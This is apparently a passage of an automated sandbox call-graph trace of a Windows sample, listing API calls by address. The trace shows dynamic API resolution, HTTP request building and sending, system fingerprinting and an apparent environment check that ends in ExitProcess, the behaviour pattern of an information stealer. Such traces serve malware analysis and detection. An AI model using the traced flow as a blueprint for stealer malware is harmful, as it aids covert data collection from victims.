API calls 14466->14467 14468 fa3be5 14467->14468 14469 fa45c0 2 API calls 14468->14469 14470 fa3bfe 14469->14470 14471 fa45c0 2 API calls 14470->14471 14472 fa3c17 14471->14472 14473 fa45c0 2 API calls 14472->14473 14474 fa3c30 14473->14474 14475 fa45c0 2 API calls 14474->14475 14476 fa3c49 14475->14476 14477 fa45c0 2 API calls 14476->14477 14478 fa3c62 14477->14478 14479 fa45c0 2 API calls 14478->14479 14480 fa3c7b 14479->14480 14481 fa45c0 2 API calls 14480->14481 14482 fa3c94 14481->14482 14483 fa45c0 2 API calls 14482->14483 14484 fa3cad 14483->14484 14485 fa45c0 2 API calls 14484->14485 14486 fa3cc6 14485->14486 14487 fa45c0 2 API calls 14486->14487 14488 fa3cdf 14487->14488 14489 fa45c0 2 API calls 14488->14489 14490 fa3cf8 14489->14490 14491 fa45c0 2 API calls 14490->14491 14492 fa3d11 14491->14492 14493 fa45c0 2 API calls 14492->14493 14494 fa3d2a 14493->14494 14495 fa45c0 2 API calls 14494->14495 14496 fa3d43 14495->14496 14497 fa45c0 2 API calls 14496->14497 14498 fa3d5c 14497->14498 14499 fa45c0 2 API calls 14498->14499 14500 fa3d75 14499->14500 14501 fa45c0 2 API calls 14500->14501 14502 fa3d8e 14501->14502 14503 fa45c0 2 API calls 14502->14503 14504 fa3da7 14503->14504 14505 fa45c0 2 API calls 14504->14505 14506 fa3dc0 14505->14506 14507 fa45c0 2 API calls 14506->14507 14508 fa3dd9 14507->14508 14509 fa45c0 2 API calls 14508->14509 14510 fa3df2 14509->14510 14511 fa45c0 2 API calls 14510->14511 14512 fa3e0b 14511->14512 14513 fa45c0 2 API calls 14512->14513 14514 fa3e24 14513->14514 14515 fa45c0 2 API calls 14514->14515 14516 fa3e3d 14515->14516 14517 fa45c0 2 API calls 14516->14517 14518 fa3e56 14517->14518 14519 fa45c0 2 API calls 14518->14519 14520 fa3e6f 14519->14520 14521 fa45c0 2 API calls 14520->14521 14522 fa3e88 14521->14522 14523 fa45c0 2 API calls 14522->14523 14524 fa3ea1 14523->14524 14525 fa45c0 2 API calls 14524->14525 14526 fa3eba 14525->14526 14527 fa45c0 2 API calls 14526->14527 14528 fa3ed3 14527->14528 14529 fa45c0 2 API calls 
14528->14529 14530 fa3eec 14529->14530 14531 fa45c0 2 API calls 14530->14531 14532 fa3f05 14531->14532 14533 fa45c0 2 API calls 14532->14533 14534 fa3f1e 14533->14534 14535 fa45c0 2 API calls 14534->14535 14536 fa3f37 14535->14536 14537 fa45c0 2 API calls 14536->14537 14538 fa3f50 14537->14538 14539 fa45c0 2 API calls 14538->14539 14540 fa3f69 14539->14540 14541 fa45c0 2 API calls 14540->14541 14542 fa3f82 14541->14542 14543 fa45c0 2 API calls 14542->14543 14544 fa3f9b 14543->14544 14545 fa45c0 2 API calls 14544->14545 14546 fa3fb4 14545->14546 14547 fa45c0 2 API calls 14546->14547 14548 fa3fcd 14547->14548 14549 fa45c0 2 API calls 14548->14549 14550 fa3fe6 14549->14550 14551 fa45c0 2 API calls 14550->14551 14552 fa3fff 14551->14552 14553 fa45c0 2 API calls 14552->14553 14554 fa4018 14553->14554 14555 fa45c0 2 API calls 14554->14555 14556 fa4031 14555->14556 14557 fa45c0 2 API calls 14556->14557 14558 fa404a 14557->14558 14559 fa45c0 2 API calls 14558->14559 14560 fa4063 14559->14560 14561 fa45c0 2 API calls 14560->14561 14562 fa407c 14561->14562 14563 fa45c0 2 API calls 14562->14563 14564 fa4095 14563->14564 14565 fa45c0 2 API calls 14564->14565 14566 fa40ae 14565->14566 14567 fa45c0 2 API calls 14566->14567 14568 fa40c7 14567->14568 14569 fa45c0 2 API calls 14568->14569 14570 fa40e0 14569->14570 14571 fa45c0 2 API calls 14570->14571 14572 fa40f9 14571->14572 14573 fa45c0 2 API calls 14572->14573 14574 fa4112 14573->14574 14575 fa45c0 2 API calls 14574->14575 14576 fa412b 14575->14576 14577 fa45c0 2 API calls 14576->14577 14578 fa4144 14577->14578 14579 fa45c0 2 API calls 14578->14579 14580 fa415d 14579->14580 14581 fa45c0 2 API calls 14580->14581 14582 fa4176 14581->14582 14583 fa45c0 2 API calls 14582->14583 14584 fa418f 14583->14584 14585 fa45c0 2 API calls 14584->14585 14586 fa41a8 14585->14586 14587 fa45c0 2 API calls 14586->14587 14588 fa41c1 14587->14588 14589 fa45c0 2 API calls 14588->14589 14590 fa41da 14589->14590 14591 fa45c0 2 API calls 14590->14591 
14592 fa41f3 14591->14592 14593 fa45c0 2 API calls 14592->14593 14594 fa420c 14593->14594 14595 fa45c0 2 API calls 14594->14595 14596 fa4225 14595->14596 14597 fa45c0 2 API calls 14596->14597 14598 fa423e 14597->14598 14599 fa45c0 2 API calls 14598->14599 14600 fa4257 14599->14600 14601 fa45c0 2 API calls 14600->14601 14602 fa4270 14601->14602 14603 fa45c0 2 API calls 14602->14603 14604 fa4289 14603->14604 14605 fa45c0 2 API calls 14604->14605 14606 fa42a2 14605->14606 14607 fa45c0 2 API calls 14606->14607 14608 fa42bb 14607->14608 14609 fa45c0 2 API calls 14608->14609 14610 fa42d4 14609->14610 14611 fa45c0 2 API calls 14610->14611 14612 fa42ed 14611->14612 14613 fa45c0 2 API calls 14612->14613 14614 fa4306 14613->14614 14615 fa45c0 2 API calls 14614->14615 14616 fa431f 14615->14616 14617 fa45c0 2 API calls 14616->14617 14618 fa4338 14617->14618 14619 fa45c0 2 API calls 14618->14619 14620 fa4351 14619->14620 14621 fa45c0 2 API calls 14620->14621 14622 fa436a 14621->14622 14623 fa45c0 2 API calls 14622->14623 14624 fa4383 14623->14624 14625 fa45c0 2 API calls 14624->14625 14626 fa439c 14625->14626 14627 fa45c0 2 API calls 14626->14627 14628 fa43b5 14627->14628 14629 fa45c0 2 API calls 14628->14629 14630 fa43ce 14629->14630 14631 fa45c0 2 API calls 14630->14631 14632 fa43e7 14631->14632 14633 fa45c0 2 API calls 14632->14633 14634 fa4400 14633->14634 14635 fa45c0 2 API calls 14634->14635 14636 fa4419 14635->14636 14637 fa45c0 2 API calls 14636->14637 14638 fa4432 14637->14638 14639 fa45c0 2 API calls 14638->14639 14640 fa444b 14639->14640 14641 fa45c0 2 API calls 14640->14641 14642 fa4464 14641->14642 14643 fa45c0 2 API calls 14642->14643 14644 fa447d 14643->14644 14645 fa45c0 2 API calls 14644->14645 14646 fa4496 14645->14646 14647 fa45c0 2 API calls 14646->14647 14648 fa44af 14647->14648 14649 fa45c0 2 API calls 14648->14649 14650 fa44c8 14649->14650 14651 fa45c0 2 API calls 14650->14651 14652 fa44e1 14651->14652 14653 fa45c0 2 API calls 14652->14653 14654 fa44fa 
14653->14654 14655 fa45c0 2 API calls 14654->14655 14656 fa4513 14655->14656 14657 fa45c0 2 API calls 14656->14657 14658 fa452c 14657->14658 14659 fa45c0 2 API calls 14658->14659 14660 fa4545 14659->14660 14661 fa45c0 2 API calls 14660->14661 14662 fa455e 14661->14662 14663 fa45c0 2 API calls 14662->14663 14664 fa4577 14663->14664 14665 fa45c0 2 API calls 14664->14665 14666 fa4590 14665->14666 14667 fa45c0 2 API calls 14666->14667 14668 fa45a9 14667->14668 14669 fb9c10 14668->14669 14670 fb9c20 43 API calls 14669->14670 14671 fba036 8 API calls 14669->14671 14670->14671 14672 fba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14671->14672 14673 fba146 14671->14673 14672->14673 14674 fba153 8 API calls 14673->14674 14675 fba216 14673->14675 14674->14675 14676 fba298 14675->14676 14677 fba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14675->14677 14678 fba337 14676->14678 14679 fba2a5 6 API calls 14676->14679 14677->14676 14680 fba41f 14678->14680 14681 fba344 9 API calls 14678->14681 14679->14678 14682 fba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14680->14682 14683 fba4a2 14680->14683 14681->14680 14682->14683 14684 fba4ab GetProcAddress GetProcAddress 14683->14684 14685 fba4dc 14683->14685 14684->14685 14686 fba515 14685->14686 14687 fba4e5 GetProcAddress GetProcAddress 14685->14687 14688 fba612 14686->14688 14689 fba522 10 API calls 14686->14689 14687->14686 14690 fba61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14688->14690 14691 fba67d 14688->14691 14689->14688 14690->14691 14692 fba69e 14691->14692 14693 fba686 GetProcAddress 14691->14693 14694 fb5ca3 14692->14694 14695 fba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14692->14695 14693->14692 14696 fa1590 14694->14696 14695->14694 15817 fa1670 14696->15817 14699 fba7a0 lstrcpy 14700 fa15b5 14699->14700 14701 fba7a0 lstrcpy 14700->14701 14702 fa15c7 14701->14702 14703 fba7a0 
lstrcpy 14702->14703 14704 fa15d9 14703->14704 14705 fba7a0 lstrcpy 14704->14705 14706 fa1663 14705->14706 14707 fb5510 14706->14707 14708 fb5521 14707->14708 14709 fba820 2 API calls 14708->14709 14710 fb552e 14709->14710 14711 fba820 2 API calls 14710->14711 14712 fb553b 14711->14712 14713 fba820 2 API calls 14712->14713 14714 fb5548 14713->14714 14715 fba740 lstrcpy 14714->14715 14716 fb5555 14715->14716 14717 fba740 lstrcpy 14716->14717 14718 fb5562 14717->14718 14719 fba740 lstrcpy 14718->14719 14720 fb556f 14719->14720 14721 fba740 lstrcpy 14720->14721 14752 fb557c 14721->14752 14722 fa1590 lstrcpy 14722->14752 14723 fb52c0 25 API calls 14723->14752 14724 fb51f0 20 API calls 14724->14752 14725 fb5643 StrCmpCA 14725->14752 14726 fb56a0 StrCmpCA 14727 fb57dc 14726->14727 14726->14752 14728 fba8a0 lstrcpy 14727->14728 14729 fb57e8 14728->14729 14730 fba820 2 API calls 14729->14730 14733 fb57f6 14730->14733 14731 fba740 lstrcpy 14731->14752 14732 fba820 lstrlen lstrcpy 14732->14752 14735 fba820 2 API calls 14733->14735 14734 fb5856 StrCmpCA 14736 fb5991 14734->14736 14734->14752 14740 fb5805 14735->14740 14739 fba8a0 lstrcpy 14736->14739 14737 fba7a0 lstrcpy 14737->14752 14738 fba8a0 lstrcpy 14738->14752 14741 fb599d 14739->14741 14742 fa1670 lstrcpy 14740->14742 14743 fba820 2 API calls 14741->14743 14751 fb5811 14742->14751 14744 fb59ab 14743->14744 14746 fba820 2 API calls 14744->14746 14745 fb5a0b StrCmpCA 14747 fb5a28 14745->14747 14748 fb5a16 Sleep 14745->14748 14749 fb59ba 14746->14749 14750 fba8a0 lstrcpy 14747->14750 14748->14752 14753 fa1670 lstrcpy 14749->14753 14754 fb5a34 14750->14754 14751->13814 14752->14722 14752->14723 14752->14724 14752->14725 14752->14726 14752->14731 14752->14732 14752->14734 14752->14737 14752->14738 14752->14745 14759 fb578a StrCmpCA 14752->14759 14761 fb593f StrCmpCA 14752->14761 14753->14751 14755 fba820 2 API calls 14754->14755 14756 fb5a43 14755->14756 14757 fba820 2 API calls 14756->14757 14758 fb5a52 14757->14758 14760 
fa1670 lstrcpy 14758->14760 14759->14752 14760->14751 14761->14752 14763 fb754c 14762->14763 14764 fb7553 GetVolumeInformationA 14762->14764 14763->14764 14765 fb7591 14764->14765 14766 fb75fc GetProcessHeap RtlAllocateHeap 14765->14766 14767 fb7619 14766->14767 14768 fb7628 wsprintfA 14766->14768 14769 fba740 lstrcpy 14767->14769 14770 fba740 lstrcpy 14768->14770 14771 fb5da7 14769->14771 14770->14771 14771->13835 14773 fba7a0 lstrcpy 14772->14773 14774 fa4899 14773->14774 15826 fa47b0 14774->15826 14776 fa48a5 14777 fba740 lstrcpy 14776->14777 14778 fa48d7 14777->14778 14779 fba740 lstrcpy 14778->14779 14780 fa48e4 14779->14780 14781 fba740 lstrcpy 14780->14781 14782 fa48f1 14781->14782 14783 fba740 lstrcpy 14782->14783 14784 fa48fe 14783->14784 14785 fba740 lstrcpy 14784->14785 14786 fa490b InternetOpenA StrCmpCA 14785->14786 14787 fa4944 14786->14787 14788 fa4ecb InternetCloseHandle 14787->14788 15832 fb8b60 14787->15832 14790 fa4ee8 14788->14790 15847 fa9ac0 CryptStringToBinaryA 14790->15847 14791 fa4963 15840 fba920 14791->15840 14795 fa4976 14796 fba8a0 lstrcpy 14795->14796 14801 fa497f 14796->14801 14797 fba820 2 API calls 14798 fa4f05 14797->14798 14799 fba9b0 4 API calls 14798->14799 14802 fa4f1b 14799->14802 14800 fa4f27 ctype 14804 fba7a0 lstrcpy 14800->14804 14805 fba9b0 4 API calls 14801->14805 14803 fba8a0 lstrcpy 14802->14803 14803->14800 14817 fa4f57 14804->14817 14806 fa49a9 14805->14806 14807 fba8a0 lstrcpy 14806->14807 14808 fa49b2 14807->14808 14809 fba9b0 4 API calls 14808->14809 14810 fa49d1 14809->14810 14811 fba8a0 lstrcpy 14810->14811 14812 fa49da 14811->14812 14813 fba920 3 API calls 14812->14813 14814 fa49f8 14813->14814 14815 fba8a0 lstrcpy 14814->14815 14816 fa4a01 14815->14816 14818 fba9b0 4 API calls 14816->14818 14817->13838 14819 fa4a20 14818->14819 14820 fba8a0 lstrcpy 14819->14820 14821 fa4a29 14820->14821 14822 fba9b0 4 API calls 14821->14822 14823 fa4a48 14822->14823 14824 fba8a0 lstrcpy 14823->14824 14825 fa4a51 14824->14825 
14826 fba9b0 4 API calls 14825->14826 14827 fa4a7d 14826->14827 14828 fba920 3 API calls 14827->14828 14829 fa4a84 14828->14829 14830 fba8a0 lstrcpy 14829->14830 14831 fa4a8d 14830->14831 14832 fa4aa3 InternetConnectA 14831->14832 14832->14788 14833 fa4ad3 HttpOpenRequestA 14832->14833 14835 fa4b28 14833->14835 14836 fa4ebe InternetCloseHandle 14833->14836 14837 fba9b0 4 API calls 14835->14837 14836->14788 14838 fa4b3c 14837->14838 14839 fba8a0 lstrcpy 14838->14839 14840 fa4b45 14839->14840 14841 fba920 3 API calls 14840->14841 14842 fa4b63 14841->14842 14843 fba8a0 lstrcpy 14842->14843 14844 fa4b6c 14843->14844 14845 fba9b0 4 API calls 14844->14845 14846 fa4b8b 14845->14846 14847 fba8a0 lstrcpy 14846->14847 14848 fa4b94 14847->14848 14849 fba9b0 4 API calls 14848->14849 14850 fa4bb5 14849->14850 14851 fba8a0 lstrcpy 14850->14851 14852 fa4bbe 14851->14852 14853 fba9b0 4 API calls 14852->14853 14854 fa4bde 14853->14854 14855 fba8a0 lstrcpy 14854->14855 14856 fa4be7 14855->14856 14857 fba9b0 4 API calls 14856->14857 14858 fa4c06 14857->14858 14859 fba8a0 lstrcpy 14858->14859 14860 fa4c0f 14859->14860 14861 fba920 3 API calls 14860->14861 14862 fa4c2d 14861->14862 14863 fba8a0 lstrcpy 14862->14863 14864 fa4c36 14863->14864 14865 fba9b0 4 API calls 14864->14865 14866 fa4c55 14865->14866 14867 fba8a0 lstrcpy 14866->14867 14868 fa4c5e 14867->14868 14869 fba9b0 4 API calls 14868->14869 14870 fa4c7d 14869->14870 14871 fba8a0 lstrcpy 14870->14871 14872 fa4c86 14871->14872 14873 fba920 3 API calls 14872->14873 14874 fa4ca4 14873->14874 14875 fba8a0 lstrcpy 14874->14875 14876 fa4cad 14875->14876 14877 fba9b0 4 API calls 14876->14877 14878 fa4ccc 14877->14878 14879 fba8a0 lstrcpy 14878->14879 14880 fa4cd5 14879->14880 14881 fba9b0 4 API calls 14880->14881 14882 fa4cf6 14881->14882 14883 fba8a0 lstrcpy 14882->14883 14884 fa4cff 14883->14884 14885 fba9b0 4 API calls 14884->14885 14886 fa4d1f 14885->14886 14887 fba8a0 lstrcpy 14886->14887 14888 fa4d28 14887->14888 14889 fba9b0 4 
API calls 14888->14889 14890 fa4d47 14889->14890 14891 fba8a0 lstrcpy 14890->14891 14892 fa4d50 14891->14892 14893 fba920 3 API calls 14892->14893 14894 fa4d6e 14893->14894 14895 fba8a0 lstrcpy 14894->14895 14896 fa4d77 14895->14896 14897 fba740 lstrcpy 14896->14897 14898 fa4d92 14897->14898 14899 fba920 3 API calls 14898->14899 14900 fa4db3 14899->14900 14901 fba920 3 API calls 14900->14901 14902 fa4dba 14901->14902 14903 fba8a0 lstrcpy 14902->14903 14904 fa4dc6 14903->14904 14905 fa4de7 lstrlen 14904->14905 14906 fa4dfa 14905->14906 14907 fa4e03 lstrlen 14906->14907 15846 fbaad0 14907->15846 14909 fa4e13 HttpSendRequestA 14910 fa4e32 InternetReadFile 14909->14910 14911 fa4e67 InternetCloseHandle 14910->14911 14916 fa4e5e 14910->14916 14914 fba800 14911->14914 14913 fba9b0 4 API calls 14913->14916 14914->14836 14915 fba8a0 lstrcpy 14915->14916 14916->14910 14916->14911 14916->14913 14916->14915 15853 fbaad0 14917->15853 14919 fb17c4 StrCmpCA 14920 fb17cf ExitProcess 14919->14920 14921 fb17d7 14919->14921 14922 fb19c2 14921->14922 14923 fb187f StrCmpCA 14921->14923 14924 fb185d StrCmpCA 14921->14924 14925 fb1913 StrCmpCA 14921->14925 14926 fb1932 StrCmpCA 14921->14926 14927 fb18f1 StrCmpCA 14921->14927 14928 fb1951 StrCmpCA 14921->14928 14929 fb1970 StrCmpCA 14921->14929 14930 fb18cf StrCmpCA 14921->14930 14931 fb18ad StrCmpCA 14921->14931 14932 fba820 lstrlen lstrcpy 14921->14932 14922->13840 14923->14921 14924->14921 14925->14921 14926->14921 14927->14921 14928->14921 14929->14921 14930->14921 14931->14921 14932->14921 14934 fba7a0 lstrcpy 14933->14934 14935 fa5979 14934->14935 14936 fa47b0 2 API calls 14935->14936 14937 fa5985 14936->14937 14938 fba740 lstrcpy 14937->14938 14939 fa59ba 14938->14939 14940 fba740 lstrcpy 14939->14940 14941 fa59c7 14940->14941 14942 fba740 lstrcpy 14941->14942 14943 fa59d4 14942->14943 14944 fba740 lstrcpy 14943->14944 14945 fa59e1 14944->14945 14946 fba740 lstrcpy 14945->14946 14947 fa59ee InternetOpenA StrCmpCA 14946->14947 14948 
fa5a1d 14947->14948 14949 fa5fc3 InternetCloseHandle 14948->14949 14950 fb8b60 3 API calls 14948->14950 14951 fa5fe0 14949->14951 14952 fa5a3c 14950->14952 14954 fa9ac0 4 API calls 14951->14954 14953 fba920 3 API calls 14952->14953 14955 fa5a4f 14953->14955 14956 fa5fe6 14954->14956 14957 fba8a0 lstrcpy 14955->14957 14958 fba820 2 API calls 14956->14958 14960 fa601f ctype 14956->14960 14962 fa5a58 14957->14962 14959 fa5ffd 14958->14959 14961 fba9b0 4 API calls 14959->14961 14964 fba7a0 lstrcpy 14960->14964 14963 fa6013 14961->14963 14966 fba9b0 4 API calls 14962->14966 14965 fba8a0 lstrcpy 14963->14965 14974 fa604f 14964->14974 14965->14960 14967 fa5a82 14966->14967 14968 fba8a0 lstrcpy 14967->14968 14969 fa5a8b 14968->14969 14970 fba9b0 4 API calls 14969->14970 14971 fa5aaa 14970->14971 14972 fba8a0 lstrcpy 14971->14972 14973 fa5ab3 14972->14973 14975 fba920 3 API calls 14973->14975 14974->13846 14976 fa5ad1 14975->14976 14977 fba8a0 lstrcpy 14976->14977 14978 fa5ada 14977->14978 14979 fba9b0 4 API calls 14978->14979 14980 fa5af9 14979->14980 14981 fba8a0 lstrcpy 14980->14981 14982 fa5b02 14981->14982 14983 fba9b0 4 API calls 14982->14983 14984 fa5b21 14983->14984 14985 fba8a0 lstrcpy 14984->14985 14986 fa5b2a 14985->14986 14987 fba9b0 4 API calls 14986->14987 14988 fa5b56 14987->14988 14989 fba920 3 API calls 14988->14989 14990 fa5b5d 14989->14990 14991 fba8a0 lstrcpy 14990->14991 14992 fa5b66 14991->14992 14993 fa5b7c InternetConnectA 14992->14993 14993->14949 14994 fa5bac HttpOpenRequestA 14993->14994 14996 fa5c0b 14994->14996 14997 fa5fb6 InternetCloseHandle 14994->14997 14998 fba9b0 4 API calls 14996->14998 14997->14949 14999 fa5c1f 14998->14999 15000 fba8a0 lstrcpy 14999->15000 15001 fa5c28 15000->15001 15002 fba920 3 API calls 15001->15002 15003 fa5c46 15002->15003 15004 fba8a0 lstrcpy 15003->15004 15005 fa5c4f 15004->15005 15006 fba9b0 4 API calls 15005->15006 15007 fa5c6e 15006->15007 15008 fba8a0 lstrcpy 15007->15008 15009 fa5c77 15008->15009 15010 
fba9b0 4 API calls 15009->15010 15011 fa5c98 15010->15011 15012 fba8a0 lstrcpy 15011->15012 15013 fa5ca1 15012->15013 15014 fba9b0 4 API calls 15013->15014 15015 fa5cc1 15014->15015 15016 fba8a0 lstrcpy 15015->15016 15017 fa5cca 15016->15017 15018 fba9b0 4 API calls 15017->15018 15019 fa5ce9 15018->15019 15020 fba8a0 lstrcpy 15019->15020 15021 fa5cf2 15020->15021 15022 fba920 3 API calls 15021->15022 15023 fa5d10 15022->15023 15024 fba8a0 lstrcpy 15023->15024 15025 fa5d19 15024->15025 15026 fba9b0 4 API calls 15025->15026 15027 fa5d38 15026->15027 15028 fba8a0 lstrcpy 15027->15028 15029 fa5d41 15028->15029 15030 fba9b0 4 API calls 15029->15030 15031 fa5d60 15030->15031 15032 fba8a0 lstrcpy 15031->15032 15033 fa5d69 15032->15033 15034 fba920 3 API calls 15033->15034 15035 fa5d87 15034->15035 15036 fba8a0 lstrcpy 15035->15036 15037 fa5d90 15036->15037 15038 fba9b0 4 API calls 15037->15038 15039 fa5daf 15038->15039 15040 fba8a0 lstrcpy 15039->15040 15041 fa5db8 15040->15041 15042 fba9b0 4 API calls 15041->15042 15043 fa5dd9 15042->15043 15044 fba8a0 lstrcpy 15043->15044 15045 fa5de2 15044->15045 15046 fba9b0 4 API calls 15045->15046 15047 fa5e02 15046->15047 15048 fba8a0 lstrcpy 15047->15048 15049 fa5e0b 15048->15049 15050 fba9b0 4 API calls 15049->15050 15051 fa5e2a 15050->15051 15052 fba8a0 lstrcpy 15051->15052 15053 fa5e33 15052->15053 15054 fba920 3 API calls 15053->15054 15055 fa5e54 15054->15055 15056 fba8a0 lstrcpy 15055->15056 15057 fa5e5d 15056->15057 15058 fa5e70 lstrlen 15057->15058 15854 fbaad0 15058->15854 15060 fa5e81 lstrlen GetProcessHeap RtlAllocateHeap 15855 fbaad0 15060->15855 15062 fa5eae lstrlen 15063 fa5ebe 15062->15063 15064 fa5ed7 lstrlen 15063->15064 15065 fa5ee7 15064->15065 15066 fa5ef0 lstrlen 15065->15066 15067 fa5f04 15066->15067 15068 fa5f1a lstrlen 15067->15068 15856 fbaad0 15068->15856 15070 fa5f2a HttpSendRequestA 15071 fa5f35 InternetReadFile 15070->15071 15072 fa5f6a InternetCloseHandle 15071->15072 15076 fa5f61 15071->15076 
15072->14997 15074 fba9b0 4 API calls 15074->15076 15075 fba8a0 lstrcpy 15075->15076 15076->15071 15076->15072 15076->15074 15076->15075 15079 fb1077 15077->15079 15078 fb1151 15078->13848 15079->15078 15080 fba820 lstrlen lstrcpy 15079->15080 15080->15079 15083 fb0db7 15081->15083 15082 fb0f17 15082->13856 15083->15082 15084 fb0e27 StrCmpCA 15083->15084 15085 fb0e67 StrCmpCA 15083->15085 15086 fb0ea4 StrCmpCA 15083->15086 15087 fba820 lstrlen lstrcpy 15083->15087 15084->15083 15085->15083 15086->15083 15087->15083 15089 fb0f67 15088->15089 15090 fb1044 15089->15090 15091 fb0fb2 StrCmpCA 15089->15091 15092 fba820 lstrlen lstrcpy 15089->15092 15090->13864 15091->15089 15092->15089 15094 fba740 lstrcpy 15093->15094 15095 fb1a26 15094->15095 15096 fba9b0 4 API calls 15095->15096 15097 fb1a37 15096->15097 15098 fba8a0 lstrcpy 15097->15098 15099 fb1a40 15098->15099 15100 fba9b0 4 API calls 15099->15100 15101 fb1a5b 15100->15101 15102 fba8a0 lstrcpy 15101->15102 15103 fb1a64 15102->15103 15104 fba9b0 4 API calls 15103->15104 15105 fb1a7d 15104->15105 15106 fba8a0 lstrcpy 15105->15106 15107 fb1a86 15106->15107 15108 fba9b0 4 API calls 15107->15108 15109 fb1aa1 15108->15109 15110 fba8a0 lstrcpy 15109->15110 15111 fb1aaa 15110->15111 15112 fba9b0 4 API calls 15111->15112 15113 fb1ac3 15112->15113 15114 fba8a0 lstrcpy 15113->15114 15115 fb1acc 15114->15115 15116 fba9b0 4 API calls 15115->15116 15117 fb1ae7 15116->15117 15118 fba8a0 lstrcpy 15117->15118 15119 fb1af0 15118->15119 15120 fba9b0 4 API calls 15119->15120 15121 fb1b09 15120->15121 15122 fba8a0 lstrcpy 15121->15122 15123 fb1b12 15122->15123 15124 fba9b0 4 API calls 15123->15124 15125 fb1b2d 15124->15125 15126 fba8a0 lstrcpy 15125->15126 15127 fb1b36 15126->15127 15128 fba9b0 4 API calls 15127->15128 15129 fb1b4f 15128->15129 15130 fba8a0 lstrcpy 15129->15130 15131 fb1b58 15130->15131 15132 fba9b0 4 API calls 15131->15132 15133 fb1b76 15132->15133 15134 fba8a0 lstrcpy 15133->15134 15135 fb1b7f 15134->15135 15136 
fb7500 6 API calls 15135->15136 15137 fb1b96 15136->15137 15138 fba920 3 API calls 15137->15138 15139 fb1ba9 15138->15139 15140 fba8a0 lstrcpy 15139->15140 15141 fb1bb2 15140->15141 15142 fba9b0 4 API calls 15141->15142 15143 fb1bdc 15142->15143 15144 fba8a0 lstrcpy 15143->15144 15145 fb1be5 15144->15145 15146 fba9b0 4 API calls 15145->15146 15147 fb1c05 15146->15147 15148 fba8a0 lstrcpy 15147->15148 15149 fb1c0e 15148->15149 15857 fb7690 GetProcessHeap RtlAllocateHeap 15149->15857 15152 fba9b0 4 API calls 15153 fb1c2e 15152->15153 15154 fba8a0 lstrcpy 15153->15154 15155 fb1c37 15154->15155 15156 fba9b0 4 API calls 15155->15156 15157 fb1c56 15156->15157 15158 fba8a0 lstrcpy 15157->15158 15159 fb1c5f 15158->15159 15160 fba9b0 4 API calls 15159->15160 15161 fb1c80 15160->15161 15162 fba8a0 lstrcpy 15161->15162 15163 fb1c89 15162->15163 15864 fb77c0 GetCurrentProcess IsWow64Process 15163->15864 15166 fba9b0 4 API calls 15167 fb1ca9 15166->15167 15168 fba8a0 lstrcpy 15167->15168 15169 fb1cb2 15168->15169 15170 fba9b0 4 API calls 15169->15170 15171 fb1cd1 15170->15171 15172 fba8a0 lstrcpy 15171->15172 15173 fb1cda 15172->15173 15174 fba9b0 4 API calls 15173->15174 15175 fb1cfb 15174->15175 15176 fba8a0 lstrcpy 15175->15176 15177 fb1d04 15176->15177 15178 fb7850 3 API calls 15177->15178 15179 fb1d14 15178->15179 15180 fba9b0 4 API calls 15179->15180 15181 fb1d24 15180->15181 15182 fba8a0 lstrcpy 15181->15182 15183 fb1d2d 15182->15183 15184 fba9b0 4 API calls 15183->15184 15185 fb1d4c 15184->15185 15186 fba8a0 lstrcpy 15185->15186 15187 fb1d55 15186->15187 15188 fba9b0 4 API calls 15187->15188 15189 fb1d75 15188->15189 15190 fba8a0 lstrcpy 15189->15190 15191 fb1d7e 15190->15191 15192 fb78e0 3 API calls 15191->15192 15193 fb1d8e 15192->15193 15194 fba9b0 4 API calls 15193->15194 15195 fb1d9e 15194->15195 15196 fba8a0 lstrcpy 15195->15196 15197 fb1da7 15196->15197 15198 fba9b0 4 API calls 15197->15198 15199 fb1dc6 15198->15199 15200 fba8a0 lstrcpy 15199->15200 15201 fb1dcf 
15200->15201 15202 fba9b0 4 API calls 15201->15202 15203 fb1df0 15202->15203 15204 fba8a0 lstrcpy 15203->15204 15205 fb1df9 15204->15205 15866 fb7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15205->15866 15208 fba9b0 4 API calls 15209 fb1e19 15208->15209 15210 fba8a0 lstrcpy 15209->15210 15211 fb1e22 15210->15211 15212 fba9b0 4 API calls 15211->15212 15213 fb1e41 15212->15213 15214 fba8a0 lstrcpy 15213->15214 15215 fb1e4a 15214->15215 15216 fba9b0 4 API calls 15215->15216 15217 fb1e6b 15216->15217 15218 fba8a0 lstrcpy 15217->15218 15219 fb1e74 15218->15219 15868 fb7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15219->15868 15222 fba9b0 4 API calls 15223 fb1e94 15222->15223 15224 fba8a0 lstrcpy 15223->15224 15225 fb1e9d 15224->15225 15226 fba9b0 4 API calls 15225->15226 15227 fb1ebc 15226->15227 15228 fba8a0 lstrcpy 15227->15228 15229 fb1ec5 15228->15229 15230 fba9b0 4 API calls 15229->15230 15231 fb1ee5 15230->15231 15232 fba8a0 lstrcpy 15231->15232 15233 fb1eee 15232->15233 15871 fb7b00 GetUserDefaultLocaleName 15233->15871 15236 fba9b0 4 API calls 15237 fb1f0e 15236->15237 15238 fba8a0 lstrcpy 15237->15238 15239 fb1f17 15238->15239 15240 fba9b0 4 API calls 15239->15240 15241 fb1f36 15240->15241 15242 fba8a0 lstrcpy 15241->15242 15243 fb1f3f 15242->15243 15244 fba9b0 4 API calls 15243->15244 15245 fb1f60 15244->15245 15246 fba8a0 lstrcpy 15245->15246 15247 fb1f69 15246->15247 15875 fb7b90 15247->15875 15249 fb1f80 15250 fba920 3 API calls 15249->15250 15251 fb1f93 15250->15251 15252 fba8a0 lstrcpy 15251->15252 15253 fb1f9c 15252->15253 15254 fba9b0 4 API calls 15253->15254 15255 fb1fc6 15254->15255 15256 fba8a0 lstrcpy 15255->15256 15257 fb1fcf 15256->15257 15258 fba9b0 4 API calls 15257->15258 15259 fb1fef 15258->15259 15260 fba8a0 lstrcpy 15259->15260 15261 fb1ff8 15260->15261 15887 fb7d80 GetSystemPowerStatus 15261->15887 15264 fba9b0 4 API calls 15265 fb2018 15264->15265 15266 fba8a0 lstrcpy 15265->15266 15267 fb2021 15266->15267 15268 
